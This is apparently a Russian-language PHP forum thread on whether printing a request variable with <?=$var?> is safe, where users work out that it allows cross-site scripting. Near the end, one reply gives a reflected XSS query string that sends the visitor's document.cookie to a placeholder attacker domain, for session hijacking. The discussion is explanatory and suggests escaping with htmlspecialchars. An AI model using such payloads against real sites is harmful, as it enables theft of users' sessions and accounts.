Безопасность строки <?=$var?>

[Oscar]

Безопасность строки <?=$var?>

Доброго времени суток!

Хотелось бы поинтересоваться, насколько безопасна строка:
<?=$var?>
(register_globals = on)

Во что она, собственно, преобразуется?
Не сможет ли злоумышленник вписать в переменную $var свой код и выполнить его таким образом?

 

[neko]

rtfm

 

[Oscar]

neko
Эх, спасибо ))
Будем читать ))

-~{}~ 26.01.05 06:18:

Если кого-то тоже заинтересует этот вопрос:

Следует помнить, что запись вида <?=, аналогичная <? echo, работает только если опция short_open_tag включена (on)

 

[neko]

вот и славно

 

[Фанат]

Oscar
Поясни, правильно ли я понял?
То есть, из процитированного куска ты сделал вывод, что запись
<?PHP echo $var ?> в отличие от предыдущей более безопасна и зловредный код выполнить не сможет?

 

[Oscar]

Фанат
нет, не правильно.
Я прекрасно, что поскольку они идентичны, то и опасность одинакова.

Однако я не могу придумать, какой зловредный код может пропускать такая запись, может приведёшь пример?

 

[wizard]

можно выполнить, например, unlink(файл) и вывести результат

 

[neko]

подтягиваются эксперты

 

[Oscar]

Файл test.php:
----begin----
<? =var?>
-----end-----

Запрос: test.php?var=TEST


wizard
Мне было бы весьма интересно узнать, что нужно написать вместо слова TEST, чтобы "выполнить, например, unlink(файл) и вывести результат".

 

[rotoZOOM]

Oscar
как сделать unlink(file) я не знаю, но вот:
test.php?var=<script language="javascript">window.open("mysite","Got it !","");</script>
естественно заменяя все спецсимволы на %XX можно слегка попротить контент.
Все зависит еще конечно от того, в каком именно куске ты это будешь выводить.

 

[Oscar]

rotoZOOM,
тебе же и прийдётся смотреть то, что ты подпортил, больше (в большинстве случаев) никому))

 

[rotoZOOM]

Oscar
я и сказал, что "можно слегка подпортить контент"
почему бы тебе (если эта переменная является текстовой) не выводить ее, предварительно ошпарив htmlspecialchars ?

 

[neko]

я фигею
ребята я сам для себя в своем браузере могу так подпортить ваш контент что никакая ошпарка непоможет

доходит?

 

[Oscar]

rotoZOOM, мне как бы особо ничего выводить и не нужно .. ))
Просто интересна тема.


neko,
"Однако я не могу придумать, какой зловредный код может пропускать такая запись, может приведёшь пример? "

Ждём Фаната ... ))

 

[stellar]

Файл test.php:
----begin----
<?=$var?>
-----end-----

Запрос: test.php?var=<script>window.open('http://coolhaxor.ru?a=' + document.cookie);</script>

И если у тебя есть cookie, а в ней - сессия без привязки к IP, то....

 

[Фанат]

XSS
PHP FAQ: Не передаются переменные! Проблема register_globals